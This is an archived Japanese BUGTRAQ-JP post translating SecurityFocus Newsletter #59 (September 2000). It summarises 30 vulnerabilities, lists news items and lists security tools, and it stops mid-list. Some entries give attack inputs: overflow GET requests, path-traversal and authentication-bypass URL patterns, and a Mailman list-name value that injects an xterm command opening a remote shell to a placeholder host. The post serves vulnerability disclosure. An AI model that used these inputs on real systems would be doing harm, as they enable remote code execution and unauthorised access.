Return-Path: owner-bugtraq-jp@SECURITYFOCUS.COM X-Mailer: Winbiff [Version 2.31PL3] Mime-Version: 1.0 Content-Type: text/plain; charset=iso-2022-jp Message-ID: <200009231643.HHG74936@lac.co.jp> Date: Sat, 23 Sep 2000 16:43:24 +0900 Reply-To: SAKAI Yoriyuki Sender: BUGTRAQ-JP List From: SAKAI Yoriyuki Subject: SecurityFocus.com Newsletter #59 2000-09-08->2000-09-15 To: BUGTRAQ-JP@SECURITYFOCUS.COM -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 坂井@ラックです。 SecurityFocus.com Newsletter 第 59 号の和訳をお届けします。訳のない項目については「日本語訳なし」として区別してあります。 - - ------------------------------------------------------------------------- SecurityFocus.com Newsletter に関するFAQ: BugTraq-JP に関する FAQ: - - ------------------------------------------------------------------------- 引用に関する備考: ・この和訳は Security-Focus.com の許可を株式会社ラックが得た上で行われています。・SecurityFocus.com Newsletter の和訳を Netnews, Mailinglist, World Wide Web, 書籍, その他の記録媒体で引用される場合にはメールの全文引用をお願いします。・日本語版ニュースレター 1 号から 3 号までにはこの備考が付いていませんが準用するものとします。・また、Security-Focus.com 提供の BugTraq-JP アーカイブ [*1] へのいかなる形式のハイパーリンクも上記に準じてください。 1) - - ------------------------------------------------------------------------- - - ------------------------------------------------------------------------- この和訳に関する備考: ・この和訳の適用成果について株式会社ラックは責任を負わないものとします。 - - ------------------------------------------------------------------------- - - ------------------------------------------------------------------------- 訳者からのお知らせ: ・もし、typo や誤訳が見つかった場合、BUGTRAQ-JP へ Errata として修正版をご投稿頂くか、訳者にお知らせください。後者の場合には修正版をできるだけ迅速に発行します。 - - ------------------------------------------------------------------------- - - ------------------------------------------------------------------------- 原版: Message-ID: Date: Wed, 20 Sep 2000 08:59:35 -0700 SecurityFocus.com Newsletter #59 - -------------------------------- I. FRONT AND CENTER(日本語訳なし) II. BUGTRAQ SUMMARY 1. Mobius DocumentDirect for the Internet 1.2 Buffer Overflow Vulns 2. SuSE Apache CGI Source Code Viewing 3. GNOME esound Unsafe /tmp File Creation Vulnerability 4. AIX netstat -Z Statistic Clearing Vulnerability 5. Check Point Firewall-1 Session Agent Impersonation Vulnerability 6. Check Point Firewall-1 Session Agent Dictionary Attack Vulnerability 7. SCO Unixware "/search97cgi/vtopic" Vulnerability 8. Tmpwatch Recursive Write DoS Vulnerability 9. muh IRC Log Format String Vulnerability 10. NT Authentication PAM Modules Buffer Overflow Vulnerability 11. Mailman 1.1 Writable Variable Vulnerability 12. YaBB Arbitrary File Read Vulnerability 13. Ranson Johnson mailto.cgi Piped Address Vulnerability 14. MailForm 2.0 XX-attach_file Vulnerability 15. Microsoft WebTV DoS Vulnerability 16. mgetty-sendfax .lastrun File Overwrite Vulnerability 17. Microsoft Windows 2000 Malformed RPC Packet DoS Vulnerability 18. Horde CGI Remote Command Execution Vulnerability 19. EFTP Buffer Overflow Vulnerability 20. EFTP Partial Input Denial of Service Vulnerability 21. Mandrake /perl http Directory Disclosure Vulnerability 22. IMP File Disclosure Vulnerability 23. Jack De Winter WinSMTP Buffer Overflow Vulnerability 24. Netegrity SiteMinder Authentication Bypass Vulnerability 25. HP OpenView Network Node Manager Config Scripts Vulnerability 26. Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability 27. Sambar Server (BETA) Search CGI Vulnerability 28. CamShot Remote Buffer Overflow Vulnerability 29. FreeBSD Eject Local Root Vulnerability 30. Pine Malformed Header Denial of Service Vulnerability III. SECURITYFOCUS.COM NEWS ARTICLES 1. Cyber SpyHunt 2. White House Flunks Back 3. Panel: 'Cyberweapons' Control Needed 4. Microsoft Cookies Jump Domains 5. Coming Out Party IV.SECURITY FOCUS TOP 6 TOOLS 1. Ethereal 0.8.12 2. ShadowSecurityScanner 1.01.001 3. Lsof 4.51 4. Wrapper v2 5. Winfingerprint 2.2.8 6. OpenSSL 0.9.5a I. FRONT AND CENTER(日本語訳なし) - - --------------------------------- Welcome to the SecurityFocus.com 'week in review' newsletter issue II. BUGTRAQ SUMMARY - - ------------------- II. BUGTRAQ SUMMARY - ------------------- 1. Mobius DocumentDirect for the Internet 1.2 Buffer Overflow Vulnerabilities BugTraq ID: 1657 リモートからの再現性: あり公表日: 2000-09-08 関連する URL: http://www.securityfocus.com/bid/1657 まとめ: Mobius 社が提供する DocumentDirect for the Internet プログラムには、未チェックの多くの静的に割り当てられたバッファが存在する。入力されるデータによっては、任意のプログラムの実行や Dos 攻撃をデータを入力したサービスの権限レベルの下で行われてしまう。バッファオーバーフローその 1 - 以下のような GET リクエストを発行し、 DDICGI.EXE をオーバーフローさせる。 GET /ddrint/bin/ddicgi.exe?[string at least 1553 characters long]=X HTTP/1.0 バッファオーバーフローその 2 - Web 認証フォームで少なくとも 208 文字からなるユーザ名を入力し、DDIPROC.EXE をオーバーフローさせる。この文字列がランダムな場合、DoS 攻撃が DocumentDirect Process Manager に実行され、関係するすべてのサービスが停止するだろう。バッファオーバーフローその3 - 以下のような GET リクエストを発行し、 DDICGI.EXE 中でのアクセス確認エラーを引き起こす。 GET /ddrint/bin/ddicgi.exe HTTP/1.0\r\nUser-Agent: [long string of characters]\r\n\r\n 2. SuSE Apache CGI Source Code Viewing BugTraq ID: 1658 リモートからの再現性: あり公表日: 2000-09-07 関連する URL: http://www.securityfocus.com/bid/1658 まとめ: SuSE Linux のバージョン 6.3 と 6.4 (これ以前のバージョンも問題となる可能性がある) は、Apache Web サーバ(SuSE のバージョン 6.4 ではバージョン 1.3.12) をインストールしている。 Apache の設定ファイル /etc/httpd/httpd.conf は、一つのエントリ (Alias /cgi-bin-sdb/ /usr/local/httpd/cgi-bin/) からなる。そのため、 /cgi-bin/ にあるファイルは、http://target/cgi-bin-sdb のようなフォーマットの URL でアクセスできてしまう。パスには /cgi-bin/ の文字列が含まれていないため、不適切な権限が設定され、ファイルはサーバ上で実行されていることとは対照的にクライアントに送られてしまう。このため、/cgi-bin/ に保存される CGI スクリプトのソースコードを読むことが可能となる。 3. GNOME esound Unsafe /tmp File Creation Vulnerability BugTraq ID: 1659 リモートからの再現性: なし公表日: 2000-08-31 関連する URL: http://www.securityfocus.com/bid/1659 まとめ: 人気のある GNOME 環境の一部である、esound パッケージには弱点が存在する。バージョン 0.2.19 以前の esound は /tmp ディレクトリにいかなるユーザであっても書き込み可能なディレクトリを作成し、通常は Unix ドメインソケットを保存するために利用する。それに代えて、システム上の攻撃者はシンボリックリンクを生成することで、 esound を実行しているユーザが所有する任意のファイルやディレクトリが、いかなるユーザ権限でも書き込み可能になってしまう。 4. AIX netstat -Z Statistic Clearing Vulnerability BugTraq ID: 1660 リモートからの再現性: なし公表日: 2000-09-03 関連する URL: http://www.securityfocus.com/bid/1660 まとめ: IBM 社製の AIX バージョン 4.x.x には問題が存在する。ローカルユーザでも、 root 権限なしに netstat の引数に -Z を指定して実行できてしまう。このためにインターフェイスの統計が初期化されてしまう。これは統計情報を調べるプログラムを潜在的に妨害する可能性がある。 5. Check Point Firewall-1 Session Agent Impersonation Vulnerability BugTraq ID: 1661 リモートからの再現性: あり公表日: 1998-09-24 関連する URL: http://www.securityfocus.com/bid/1661 まとめ: Check Point が提供する Firewall-1 の "セッションエージェント" には弱点が存在する。この弱点は FW-1 4.1 以前のセッションエージェントのすべてのバージョンに存在する。セッションエージェントは Windows 9x または、Windows NT を動作しているコンピュータ上、ファイアウォールからの接続のためにポートを開き、接続のための認証を要求している。ところが、この情報は、すべて平文で送られ、なお、かつ、認証されていないのである。これは盗聴できることを意味する。付け加えて、エージェントはいかなるホストからの接続も受け付けてしまう。セッションエージェントに接続できるユーザなら誰でも、 Firewall-1 モジュールを装うことができ、ユーザ名とパスワード情報を要求できる。実行された場合、ユーザ名とパスワードを悪用されてしまう結果となる。 6. Check Point Firewall-1 Session Agent Dictionary Attack Vulnerability BugTraq ID: 1662 リモートからの再現性: あり公表日: 2000-08-15 関連する URL: http://www.securityfocus.com/bid/1662 まとめ: Firewall-1 の Check Point セッションエージェントのすべてのバージョンには問題が存在する。セッションエージェントは以下の様に動作する。ファイアウォールはクライアントマシンからの接続を確立する。その最中にユーザ名を入力するように要求し、入力されたユーザ名が存在すれば、パスワードも同様に要求する。失敗した場合は、永遠にこの動作を繰り返す。このため、ユーザ名とパスワードに対する単純なブルートフォース攻撃を許してしまう。 7. SCO Unixware "/search97cgi/vtopic" Vulnerability BugTraq ID: 1663 リモートからの再現性: あり公表日: 2000-09-11 関連する URL: http://www.securityfocus.com/bid/1663 まとめ: SCO Unixware の特定のバージョンでは、Web 上で利用できるヘルプシステムをデフォルトでインストールし、出荷されている。このシステムは、httpd-scohelphttp という名称で、Web サーバが実行されているアカウント (通常 'nobody') でしか読めないはずのファイルがリモートユーザにも読めるという問題のある CGI プログラムを含んでいる。この問題は以下の CGI のために起こる。 /usr/ns-home/httpd-scohelphttp/search97cgi/vtopic この CGI は、検索の結果を使用するための HTML テンプレートを指定するために ViewTemplate というパラメータを利用する。 http://unixware7box:457/search97cgi/vtopic?action=view&ViewTemplate= しかしながら、この CGI は相対パスに何の制限もかけないため、ユーザはパスを作成でき、そのため、(../) という文字列を利用して Web コンテンツのルートディレクトリの外部に移動できてしまうのである。 8. Tmpwatch Recursive Write DoS Vulnerability BugTraq ID: 1664 リモートからの再現性: なし公表日: 2000-09-09 関連する URL: http://www.securityfocus.com/bid/1664 まとめ: /tmp や /var/tmp に書き込み権限を持つユーザであれば誰でも、tmpwatch に redhat 6.1 (もしくは cron から tmpwatch を実行していれば他のディストリビューションでも) の応答を停止することができ、電源を入れ直さなければならない可能性がある。これは /tmp 中に多数のノード (例 ~6000) をもつディレクトリを生成するために引き起こされる。/tmp 以下のディレクトリのどの階層でも、tmpwatch は自身の複製を fork() する。 9. muh IRC Log Format String Vulnerability BugTraq ID: 1665 リモートからの再現性: あり公表日: 2000-09-09 関連する URL: http://www.securityfocus.com/bid/1665 まとめ: muh は、irc クライアントとサーバの間でプロキシの役割を演じる。irc サーバから見れば muh セッションは irc クライアントのように振る舞い、irc クライアントから見れば muh セッションは irc サーバのように振る舞う。 muh には、クライアントが接続を切断したときに、クライアントのメッセージをログに取る機能がある。バージョン 2.05 (それ以前のバージョンにも可能性がある) には、ログに取られるメッセージがクライアントによっておきかえられた場合、muh をクラッシュさせてしまうフォーマットバグの問題がある。また、このバグを利用することで muh を稼動しているユーザの権限で任意のプログラムを実行することが可能である。 10. NT Authentication PAM Modules Buffer Overflow Vulnerability BugTraq ID: 1666 リモートからの再現性: あり公表日: 2000-09-11 関連する URL: http://www.securityfocus.com/bid/1666 まとめ: pam_smb と pam_ntdom は、Unix ユーザに NT ドメインコントローラへ認証するためのプラグインモジュールである。pam_smb モジュールにはリモートから攻撃可能なバッファオーバーフローの弱点がある。pam_smb から派生する pam_ntdom にも同様の弱点がある。この問題は、境界をチェックをすることなく 16 バイトのスタックに長いユーザ名をコピーしてしまうために生じる。 11. Mailman 1.1 Writable Variable Vulnerability BugTraq ID: 1667 リモートからの再現性: なし公表日: 2000-09-07 関連する URL: http://www.securityfocus.com/bid/1667 まとめ: Mailman は MHonArc、または hypermail に外部のアーカイバを利用することでメッセージをアーカイブ化する機能を備えている。内部から Mailman へはどの変数に基づいているかをマクロが決めるために使われる可能性がある。例えば、 $prefix/Mailman/mm_cfg.py に続くエントリを per-list に基づいてリストアーカイブを保存することができる。 PUBLIC_EXTERNAL_ARCHIVER = '(mhonarc -add -nolock -umask 023 -rcfile rc.%(listname)s -outdir /mnt/WWW/htdocs/lists/%(listname)s)' (listname) の値はリスト管理者によって各リストごとに生成できる。 listname 変数がシステムコマンドに設定された場合、Mailman がメッセージをアーカイブに追加するためのリストにメッセージが送られるたびにそのコマンドが実行される。例えば、listname の値が次のように設定された場合である。 `/usr/X11R6/bin/xterm -display myhost.example.com:0 -e /bin/csh` リストがメッセージを受信したとき、埋め込まれたコマンドが実行され、この例では、リモートから Web サーバの uid/gid 下でシェルを実行している xterm を開くことができる。 PUBLIC_EXTERNAL_ARCHIVER の定義の設定によっては、他の変数の名前は受け付けられる。 Solution タブ以下にパッチを置くことが、この %(listname)s 展開問題の唯一の修正方法である。 12. YaBB Arbitrary File Read Vulnerability BugTraq ID: 1668 リモートからの再現性: あり公表日: 2000-09-10 関連する URL: http://www.securityfocus.com/bid/1668 まとめ: YaBB.pl は web 上での掲示板スクリプトで、書き込まれた内容をを数字で順番付けられたファイルで管理する。順番付けられたファイルは、変数 num= という形で YaBB.pl に要求が出され特定される。また、そのファイルを検索する前にYaBB はに .txt 拡張子を付加する。 YaBB 中で入力の妥当性を調べる際に問題があるために、相対パスがに記されてしまう。これは、../ という形のパスを含む。付け加えて、は数字である必要はなく、.txt 拡張子は、に %00 を付加することで避けることができる。 1 回のリクエストでこの問題を利用することによって、悪意のあるユーザは、 Web サーバが参照できる任意のファイルを見ることが可能になる。 13. Ranson Johnson mailto.cgi Piped Address Vulnerability BugTraq ID: 1669 リモートからの再現性: あり公表日: 2000-09-11 関連する URL: http://www.securityfocus.com/bid/1669 まとめ: Ranson Johnson が提供する Combination Mail-to and Credit Card Orderform 中で使われる 'emailadd' 変数の値は、パイプを使ってマシンへの入り口を開けるために利用される。この値はユーザがフォームを埋める際に入力される。フォーム上の 'emailadd' フィールドに特別に組み立てられた値を入力することによって Web サーバの権限レベルでリモートからコマンドを実行される可能性がある。 14. MailForm 2.0 XX-attach_file Vulnerability BugTraq ID: 1670 リモートからの再現性: あり公表日: 2000-09-11 関連する URL: http://www.securityfocus.com/bid/1670 まとめ: MailForm 2.0 はメッセージを扱うために多数の隠しフォームフィールドを利用している。隠しフォームフィールドは、ページをローカルコピーして編集するためや、望まない結果を得た時の履歴を残すために使われる。この内、XX-attach_file フィールドの値は、CGI が参照できるファイルのコピーを CGI が攻撃者に電子メールで送るように MailForm 2.0 を用いて修正することが可能である。 15. Microsoft WebTV DoS Vulnerability BugTraq ID: 1671 リモートからの再現性: あり公表日: 2000-09-12 関連する URL: http://www.securityfocus.com/bid/1671 まとめ: リモートユーザが UDP パケットを WebTV for Windows が稼動するシステムの 22701 番から22705 番の任意のポートに送ると、システムは完全にクラッシュしてしまうか、少なくともプログラムは応答を停止する。同様に、UDP パケットを 22703 番ポートに送ることで、自動的に再起動してしまうことが既知となっている。 16. mgetty-sendfax .lastrun File Overwrite Vulnerability BugTraq ID: 1672 リモートからの再現性: なし公表日: 2000-09-11 関連する URL: http://www.securityfocus.com/bid/1672 まとめ: mgetty-sendfax にある faxrunq と faxrunqd コマンドは、最後に faxruq コマンドが実行された日時を調べるために /var/spool/fax/outgoing/.lastrun というファイルを使用している。攻撃者は任意のマウントされたファイルシステム上にある任意のファイルを指し示す /var/spool/fax/outgoing/.lastrun というシンボリックリンクを生成できるため、faxrunq が実行されたとき、このファイルの内容が上書き可能である。 17. Microsoft Windows 2000 Malformed RPC Packet DoS Vulnerability BugTraq ID: 1673 リモートからの再現性: あり公表日: 2000-09-11 関連する URL: http://www.securityfocus.com/bid/1673 まとめ: Microsoft Windows 2000 の RPC サービスにある固有の弱点のために、Windows 2000 上の RPC サービスをクラッシュする可能性がある。そのため入ってくる RPC リクエストを拒否してしまう。巧く改竄した RPC パケットを 135 番から 139 番、または 445 番ポートを通して Windows 2000 サーバに送ることで、 RPC サービスを完全に停止できる。通常の機能を回復するためには再起動が必要である。 18. Horde CGI Remote Command Execution Vulnerability BugTraq ID: 1674 リモートからの再現性: なし公表日: 2000-09-08 関連する URL: http://www.securityfocus.com/bid/1674 まとめ: Horde は、Web 上で生産性、伝言、計画管理を行なう PHP 言語で書かれたアプリケーションで、GPL かつ LGPL ライセンスの下で配布されている。電子メールを送信するためには、コマンドの文字列 (シェルによって分解される) の一部としてユーザの入力を用いて sendmail を実行するために popen を利用する。ユーザの入力として生成されるパラメータの一つ、"form" の値は、horde が稼動しているサーバへのリモートアクセスに利用できてしまう。スクリプトは、変数の値が popen() 関数によって実行されるシェルに送られる前に正しい値であるか確認しない。結果として、攻撃者が標的となるホストの Web サーバの権限でアクセスを許してしまう可能性があり、最初に Horde からメールを送ることができるようになる(大抵の場合は認証され、そのためローカルの弱点に分類される)。"from" フィールドは、このような問題に関係する唯一のパラメータである。他の変数はどんなメタ文字を消去する関数によって保護される。 19. EFTP Buffer Overflow Vulnerability BugTraq ID: 1675 リモートからの再現性: あり公表日: 2000-09-11 関連する URL: http://www.securityfocus.com/bid/1675 まとめ: EFTP は、Khalim Landross が作成した暗号化と通常の 2 種類のファイル転送機能を提供するフリーウエアの ftp クライアントとサーバのパッケージである。サーバが 2100 文字以上のリクエストを受信した場合、関係のないデータによって上書きされるメモリ領域のため、クラッシュしてしまう。大抵の場合、サーバがクラッシュする。リクエストが巧妙に組み立てられたものである場合、 EFTP を稼動させているサーバ上で任意のプルグラムを実行することが可能である。 20. EFTP Partial Input Denial of Service Vulnerability BugTraq ID: 1677 リモートからの再現性: あり公表日: 2000-09-11 関連する URL: http://www.securityfocus.com/bid/1677 まとめ: EFTP は、Khalim Landross が作成した暗号化された ftp をサポートする小型のフリー ftp サーバである。多くの FTP サーバがそうであるように、入ってくるデータバッファの改行文字を基にサーバへのリクエストを分解する。不運なことに、EFTP は接続が閉じる前に改行文字が全くないリクエストを受け取ることが考慮に入れられてないため、そういったリクエストがなされた場合、予期できない振る舞いをしてしまう弱点がソフトウエアに残ったままである。クライアントが ftp サーバに接続し、"リクエストを終了する"ための改行文字を含まないデータを送信すると、サーバは DoS 状態に陥ってしまう。 21. Mandrake /perl http Directory Disclosure Vulnerability BugTraq ID: 1678 リモートからの再現性: あり公表日: 2000-09-11 関連する URL: http://www.securityfocus.com/bid/1678 まとめ: Mandrake Linux 6.1 から 7.1 に含まれて出荷されている一連のmod_perlのデフォルトの設定ファイルには、ある状況ではセキュリティ上の懸念となる設定ミスがある。/perl ディレクトリは、Perl スクリプトを保存するために使われる Web サーバの Web ドキュメント用のルートディレクトリツリー(Web サーバ上でファイルにアクセスできるサブディレクトリツリー)の一部である。Apache の perl インタプリタモジュールである mod_perl の設定ファイル中に、このディレクトリは"indexed"に制限されている。この"indexed"の意味することは、 Web サーバは Web サーバ自身からリクエストを受けた場合、ディレクトリの内容を表示するということである。その結果、攻撃者は /perl 中のファイルが何かを知ることができる。このバグはどのように Web サーバがディレクトリ中のファイルを解釈するかには関係がないが (例. まだ実行中である)、そこで何が実行されているかを知ることは、スクリプトのリストから弱点のあるスクリプトに的を絞ったより知的な攻撃をするために有益である。 22. IMP File Disclosure Vulnerability BugTraq ID: 1679 リモートからの再現性: あり公表日: 2000-09-12 関連するURL: http://www.securityfocus.com/bid/1679 まとめ: IMP は PHP のスクリプト群からなる、IMAP を利用した Web メールを提供するシステムである。特定のバージョンの IMP は、IMP が攻撃者にメールを送付してしまうことにより、攻撃者がサーバ内のファイルを入手でき得てしまえる問題がある。この問題はユーザが与えた価が PHP スクリプトに渡されてしまうために生じるものである。問題となるスクリプトは、通常、IMP を使う上で、添付ファイルを追跡するためのあらかじめ定義されている変数を用いる前提がある。これに関連する変数は以下が典型的な例である。 attachments_name[] この変数には通常メールの受け取り手が読み取ることができないファイルをユーザによって指定可能なのである。この行為は IMP を実行させているユーザ権限で行われる。読み取ることができる条件は IMP を実行させているユーザ権限に依存する問題である。攻撃者へファイルを添付して送り出せてしまう問題に付け加えるならば、IMP は添付した後に、ファイルを unlink するのである。もしこの対象となったファイルが IMP を実行しているユーザによって書き込み可能な場合、ファイルは削除されてしまう。 23. Jack De Winter WinSMTP Buffer Overflow Vulnerability BugTraq ID: 1680 リモートからの再現性: あり公表日: 2000-09-11 関連するURL: http://www.securityfocus.com/bid/1680 まとめ: Jack De Winter氏による　Win SMTP デーモンの SMTP および POP3 コンポーネントには数多くの未チェックのバッファがあり、DoS 、あるいは与えられたデータによっては意図的なコードの実行をもたらす問題がある。約 170 バイトを越える HELO コマンド、約 370 バイトを越える USER コマンドを与えた場合、Windows 一般保護エラー(訳注: ワトソン博士の起動)を生じる。 24. Netegrity SiteMinder Authentication Bypass Vulnerability BugTraq ID: 1681 リモートからの再現性: あり公表日: 2000-09-11 関連するURL: http://www.securityfocus.com/bid/1681 まとめ: Netegrity 社が提供する SiteMinder ソフトウェアはサーバ上にある Web コンテンツにアクセスコントロールを提供するよう設計されている。しかし、特別に改ざんされた URL を与えることによって、未認証のクライアントが保護されているコンテンツへ読みだし権限を得られ、あるいは、保護されたコンテンツの実行ができてしまえるのである。もし URL が目的とする URL に続けて '/$/nonexistantfile.ext' を付けて与えられた際、サーバはプロンプトを出力することなく、あるいは、なんら認証を求めることなくリクエストされたコンテンツをクライアントを返してしまうのである。存在しないファイルの拡張子はチェックされ、.ccc, .jpg についてのみ、それがチェックされることが判明できている。なお、保護されているコンテンツが CGI アプリケーションである場合、付け加えられる文字列の前に変数と価が指定される。もし、価が指定されなかった場合には、サーバは CGI のソースを返してしまう。 25. HP OpenView Network Node Manager Config Scripts Vulnerability BugTraq ID: 1682 リモートからの再現性: 未詳公表日: 2000-09-12 関連するURL: http://www.securityfocus.com/bid/1682 まとめ: HP が発表したアドバイザリ、HPSBUX0009-120 によると、OpenView NNM に含まれるデータベース設定用スクリプトにはセキュリティ上不十分な点があり、ログイン時にユーザに不正な権限を取得させてしまえる問題がある。 26. Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability BugTraq ID: 1683 リモートからの再現性: あり公表日: 2000-09-14 関連するURL: http://www.securityfocus.com/bid/1683 まとめ: デフォルト状態で、Microsoft Windows 2000 に付属する telnet クライアント (telnet.exe) は Windows NT Challenge/Response (NTLM) を認証手段に用いている。このクライアントがホストとコネクションを確立する際、NTLM での認証を、telnet サーバが Windows telnet サーバかどうかには関係なく、試みてしまう。このため、NTLM challenge/response セッションはモニタ可能で、ユーザ名、パスワード、ドメイン等の重要な情報を漏洩させてしまう様にクラック可能である。 NTLM challenge/response プロトコルはブルートフォース攻撃を、例えば "L0phtcrack" に代表されるツールを用いて、受ける可能性がある。リモートのターゲットで telnet セッションを強制的に開始できる事は、可能性があり得る問題である。例えば、Microsoft Internet Explorer, Outlook (Express), Netscape Navigator といった製品は自動的に "telnet://" という資源名が付いた URL を自動的にデフォルトの telnet クライアント (通常、telnet.exe である) でアクセスするからである。以下はアクセスされたサーバによって、telnet セッションが開始される例を示したものである。 1) 2) 3) 27. Sambar Server (BETA) Search CGI Vulnerability BugTraq ID: 1684 リモートからの再現性: あり公表日: 2000-09-15 関連するURL: http://www.securityfocus.com/bid/1684 まとめ: Sambar サーバは Sybase Open Client/Open Server に続く、three-tier 方式の通信インフラストラクチャも出るをテストするために設計されたソフトウェアである。これは、HTTP プロトコルスタックへの追加により、WWW で配布されるコンテンツの動的配送を平滑化するインフラストラクチャという概念を元にしており、HTTP 経由で既存のユーザへの通知機能を提供するために効果的な結果が得られる、というものである。元々このソフトウェアは Sun Workstation (UNIX) で開発され、PC 環境 (Win32) へ移植され、商業目的でライセンスが提供されている。1996年の終わりに完全に基本的なコードが書き直しされた後、様々な機能が追加され、1997 年 2 月にバージョン 3.0 が提供開始されている。また、バージョン 4.0 は 1997 年の 5月半ばに提供開始されている。このソフトウェアの特定のベータバージョンの search.dll には、リモートの攻撃者が SAMBAR Server の内容、例えばメールフォルダを参照できてしまえる問題がある。なお、現在利用できる情報によると、この問題はこのソフトウェアの「ベータ」版に含まれる問題であることが強調されている。 28. CamShot Remote Buffer Overflow Vulnerability BugTraq ID: 1685 リモートからの再現性: あり公表日: 2000-09-15 関連するURL: http://www.securityfocus.com/bid/1685 まとめ: CamShot は Windows 95/98/NT/2000 で動作する Web サーバであり、ビデオカメラで撮影された時刻暦付き画像を Web ページとして提供するソフトウェアである。画像は Web ブラウザを用い、ネットワーク上のいかなる場所からでも参照可能である。このソフトウェアは Video for Windows 互換の画像取り扱い操作が可能である。このソフトウェアの特定の試供版では、認証用パスワードとして非常に長い文字列が与えられることによりバッファオーバーフローがリモートから引き起こし可能である問題を抱えている。なお、同様の問題が商業版でも生じるかどうかについては未詳である。 29. FreeBSD Eject Local Root Vulnerability BugTraq ID: 1686 リモートからの再現性: なし公表日: 2000-09-13 関連するURL: http://www.securityfocus.com/bid/1686 まとめ: eject コマンドにはローカルのユーザが root 権限をバッファオーバーフローを用いることで奪取する可能性がある、攻撃可能なバッファがある。 30. Pine Malformed Header Denial of Service Vulnerability BugTraq ID: 1687 リモートからの再現性: あり公表日: 2000-09-13 関連するURL: http://www.securityfocus.com/bid/1687 まとめ: Pine は UNIX のコンソールで利用可能な最も著名な電子メールクライアントである。改ざんされた X-Keywords ヘッダ (このヘッダは電子メールのヘッダの一部として取り扱われる)(訳注: X- で始まっているため、拡張ヘッダの一種です) を含むメールボックス内のメッセージに、pine がアクセスした際、メールボックス内のファイルを解釈しようと試みる時点でクライアントは何ら停止理由をユーザへ示すことなく、クラッシュしてしまう。この結果、悪意ある改ざんされたヘッダを持つメッセージが削除されるまで、電子メールの受信者は DoS 状態に陥れられてしまう。 III. SECURITYFOCUS.COM NEWS AND COMMENTARY - ------------------------------------------ 1. Cyber SpyHunt 著者: Kevin Poulsen September 18, 2000 現在の情報化時代の中で、最大のコンピュータセキュリティ事象の根幹を揺るがすかもしれない可能性として、McCarthy と Hoover の考え方が情報ハイウェイ上をさまよっているのに気付くだろう。例えば市街地でふらふら歩くヒッチハイカーの様に。行方知れずの行き先を示す親指で方向を示し、ドライバーが減速し、乗せるかどうかを希望という名のフィルム越しに見渡しながら決める様に。不運にも、それは請願であり、司法制度が進めようとしていることであり、助手席側のドアを開け、尋ねることなのだ。「行き先はどこなんだい?」 http://www.securityfocus.com/templates/article.html?id=87 2.White House Flunks Back 著者: Kevin Poulsen September 13, 2000 ワシントン発: この水曜日に、議会での連邦部局のコンピュータセキュリティについて、十分ではないという苦情に値するという指摘という、最大限の援軍をクリントン大統領は得た。「連邦政府は議会へ今後 2 年間に渡る(コンピュータセキュリティに関する) 予算配分を求めるものである。以前の 2 年間に渡り、議会は拒否しつづけて来たのである。」と、ホワイトハウスの National Security Council において、インフラストラクチャについての保護、コンピュータテロに対してセキュリティに関する国家機関におけるコーディネータを勤める Richard Clarke は語っている。「一体、どのようなグレードを議会に示せばよいのだろうか?」 http://www.securityfocus.com/templates/article.html?id=85 3. Panel: 'Cyberweapons' Control Needed 著者: Kevin Poulsen September 12, 2000 3:46 PM PT ワシントン発: 悪意あるコンピュータプログラムの国際的な広がりはこの 2 年間において非常に増加した。そして、法務当局へもコンピュータ犯罪への対応において効果的なツールをもたらす事につながっている。これはこの火曜日にワシントンで開かれた InfowarCon 2000 で発表した米国およびヨーロッパの担当官の発表に依るものだ。 http://www.securityfocus.com/templates/article.html?id=84 4. Microsoft Cookies Jump Domains 著者: Kevin Poulsen September 12, 2000 1:44 AM PT Microsoft 製の最新の Interlet Explorer ベータ版でのプライバシ拡張は、企業が MSNBC.com, Expedia, bCentral 等の Web サイトへの訪問者のアクセス履歴を追跡し続け始めるのに用いられた隠蔽技術から利用者を保護しないことが明らかになった。 http://www.securityfocus.com/templates/article.html?id=83 5. Coming Out Party By Kevin Poulsen September 11, 2000 6:03 AM PT 1,334 件以上もの米国特許が 17 年間の有効期間を満了し、9月20日で期限切れを生じる。これは米国にとって手放しの喜びではない。特許が繰り返される電話の呼び出し音を小さくする例であれば、それは誰に対してでもライセンス費用なしに利用価値があるものであり、特にシャンパンで祝われる筋のものではないだろう。しかし、組み合わされた義歯の蝋を溶かし、虫歯の穴を治療する特許、音声信号の歪みに対する回路に関する特許、酢酸エステルを作成する処理プロセスについての特許については、特許の名誉が公開されるにあたり、紙ふぶきでたたえられる程ではないものの、一般へすべて公開されるであろう。しかし、米国特許番号 4,405,829 "Cryptographic Communications System And Method" については異なる取り扱われ方をするだろう。 http://www.securityfocus.com/templates/article.html?id=82 IV.SECURITY FOCUS TOP 6 TOOLS - ----------------------------- 1. Ethereal 0.8.12 (AIX, FreeBSD, HP-UX, IRIX, Linux, NetBSD, OpenBSD, SCO, Solaris and True64 UNIX) 作者: Gerald Comb (gerald@zing.org) 関連するURL: http://ethereal.zing.org/ Etherreal はネットワークプロトコルアナライザ、あるいはいわゆる「スニファ」であり、ネットアーク上のパケットの内容を対話的に参照し、取り出しできるツールです。このプロジェクトのゴールは、 UNIX プラットフォーム向けへ商業品質のパケットアナライザを提供することで、いかなるプラットフォームにおいても、最も価値あるソフトウェアとなることです。Erherreak は現在、圧縮 Sniffer ファイルフォーマットを解釈可能です。RTP, IP, ISAKMP, ICMP, SMB, SMB-PIPE, VTP, SNMPv3, Ethernet, GRE, EIGRP, DHCP, IPX, X.25, RSVP, L2TP 用の解析部が更新され続けています。また、Mobile IP と COPS についても追加されました。解析部の API はよりエラー回避可能で、頑丈なプログラムを提供するために劇的に変更されました。しかし、新しい API への解析部の変更は現在進行中です。 syslog, X11, CLZTP プロトコルの解析機能がサポートされました。 Etherreal は NetXRay 2.002 形式のファイルと Linux ATX インタフェースからの入力を受け付け可能です。Win 32 バージョンでは "Update list of packets in real time" 機能が提供されています。 2.ShadowSecurityScanner 1.01.001 (Windows 2000, Windows 95/98 and Windows NT) 作者: RedShadow, red@rsh.kiev.ua 関連するURL: http://www.rsh.kiev.ua 新バージョンの ShadowSecurityScaner では以下がアップデートされています。 1. スキャナの本体が完全に書き直されました。 2. 基準となるフォーマットが変更されました。 3. 新しい基準により追尾可能性が改善されました。 4. インタフェースが変更されました。 5. オプションがより広範囲になりました。 6. NetBios コントロールが Windows 9x 下でも動作する用になりました。 7. ホスト一覧についての確認可能性が追加されました。 8. 以前のバージョンで発見された不具合が改善されました。 9. ユーザの Netbios パスワードをチェックする新しい手段が提供されました。 10. パスワード一覧からユーザのパスワードをチェックする機能が提供されました。 3. Lsof 4.51 (AIX, BSDI, Digital 